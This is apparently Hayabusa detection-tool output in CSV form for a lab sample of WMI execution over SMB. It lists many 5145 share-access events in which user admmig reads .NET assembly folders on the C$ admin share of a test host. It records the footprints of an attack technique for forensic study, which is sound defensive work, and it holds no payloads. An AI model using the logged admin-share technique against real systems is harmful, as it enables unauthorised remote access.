+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
